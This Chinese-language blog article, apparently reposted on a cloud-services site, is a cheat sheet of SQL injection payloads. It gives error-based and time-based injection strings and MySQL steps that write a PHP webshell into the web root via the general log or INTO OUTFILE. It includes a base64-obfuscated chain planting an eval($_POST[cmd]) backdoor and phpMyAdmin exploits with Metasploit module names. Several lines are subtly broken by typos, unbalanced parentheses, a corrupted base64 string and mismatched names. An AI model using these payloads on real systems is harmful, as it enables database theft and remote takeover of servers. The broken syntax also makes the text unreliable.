SQL注入語法有哪些

這篇文章主要介紹了SQL注入語法有哪些，具有一定借鑒價值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

僅供參考學(xué)習(xí)使用。

SQL注入語法

報錯注入

updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+

select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2)

select substr(version(),1,1)='X'

select substring(version(),1,1)='X'

列名重復(fù)報錯

select * from (select name_const(version(),1))a;

select * from (select name_const((version()),1),name_const((select database()),1))a;

select * from (select * from users a join users b)c;

數(shù)據(jù)溢出報錯

select (select(!x-~0) from (select(select user())x)a);

select ~0+!(select * from (select user())x);

幾何函數(shù)報錯

multipoint((select * from(select * from(select user())a)b));

case when 語句

select * from datadatabase() case id when 1 else 2 end

時間注入

if right((select database()),a,b)>'s' sleep(5)

if assic(substr((select database()),a,b))=98 sleep(5)

if assic(substr((select database()) from a to b))=98 sleep(5)

if ord(mid((select database()),a,b))=98 sleep(5)

通過日志寫shell

利用條件

已知物理路徑，目錄可寫，root權(quán)限。

查看配置

show variables like '%general';

開啟general log模式

set global general_log=on;

設(shè)置日志寫shell地址*

set global general_log_file="/var/www/html/log.php";

寫入shell

select "<?php phpinfo();>";

通過into outfile寫shell

利用條件

已知物理路徑，目錄可寫

select '<?php phpinfo();>' into outfile ‘/var/www/html/1.php'

通過導(dǎo)出表寫入shell

use mysql;

create table shell(shell1 text not null);

insert into shell(cmd1) values('<?php phpinfo();>');

select cmd1 from a into outfile '/var/www/html/1.php';

mysql from_base64函數(shù)利用

利用base64編碼來加密，然后使用自定義變量接到，在使用prepare和EXECUTE來執(zhí)行語句，完成日志寫shell的操作。

set

set 用戶定義一個變量，變量里面是sql可以執(zhí)行的語句。

prepare

prepare name from value；

prepare 語句用于預(yù)備一個語句，并指定名稱name，然后引用改語句。

execute

execute 語句用于執(zhí)行預(yù)備的語句。

聯(lián)合起來利用

set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='));
/*set global general_log=on*/
PREPARE name from @sql;
EXECUTE name;
set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg=='));
/*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/
PREPARE name from sql2;
EXECUTE name;
select "<?php eval($_POST[cmd]); ?>";
set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg=='));
/*set global general_log = off*/
PREPARE name from @sql3;
EXECUTE name;

phpmyadmin 漏洞合集

phpmyadmin存在pregreplaceeval漏洞

影響版本：3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 CVE-2013-3238

phpmyadmin存在serversync.php后門漏洞

影響版本 phpmyadmin v3.5.2.2

msf利用模塊 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159

phpmyadmin 配置文件/config/config.inc.php存在命令執(zhí)行漏洞

影響版本： 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

msf利用模塊：exploit/unix/webapp/phpmyadmin_config CVE-2009-1151

登錄處漏洞

利用方法：用戶名處寫入'localhost'@'@"

影響版本：2.113/2.114

php爆絕對路徑

phpMyAdmin/libraries/selectlang.lib.php

phpMyAdmin/darkblueorange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

感謝你能夠認(rèn)真閱讀完這篇文章，希望小編分享的“SQL注入語法有哪些”這篇文章對大家有幫助，同時也希望大家多多支持億速云，關(guān)注億速云行業(yè)資訊頻道，更多相關(guān)知識等著你來學(xué)習(xí)!